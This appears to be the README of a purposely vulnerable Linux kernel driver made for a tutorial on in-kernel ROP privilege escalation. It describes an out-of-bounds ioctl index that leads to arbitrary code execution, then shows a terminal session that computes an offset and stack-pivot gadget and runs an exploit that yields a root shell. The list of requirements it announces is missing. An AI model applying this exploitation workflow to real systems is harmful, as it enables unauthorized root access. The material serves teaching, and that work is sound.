

Linux Kernel ROP demo

This is a vulnerable Linux kernel driver used to demonstrate in-kernel privilege escalation ROP (Return Oriented Programming) chain in practice. The article URL for Part 1 is available at https://cyseclabs.com/page?n=17012016.

The driver module is vulnerable to OOB access and allows arbitrary code execution. An arbitrary offset can be passed from user space via the provided ioctl(). This offset is then used as the index for the 'ops' array to obtain the function address to be executed.

The goal is to construct and execute a ROP chain that will satisfy the following requirements:

vnik@ubuntu:~$ dmesg | grep addr | grep ops
[  244.142035] addr(ops) = ffffffffa02e9340
vnik@ubuntu:~$ ~/find_offset.py ffffffffa02e9340 ~/gadgets 
offset = 18446744073644231139
gadget = xchg eax, esp ; ret 0x11e8
stack addr = 8108e258

vnik@ubuntu:~/kernel_rop/vulndrv$ gcc rop_exploit.c -O2 -o rop_exploit
vnik@ubuntu:~/kernel_rop/vulndrv$ ./rop_exploit 18446744073644231139 ffffffffa02e9340
array base address = 0xffffffffa02e9340
stack address = 0x8108e258
# id    
uid=0(root) gid=0(root) groups=0(root)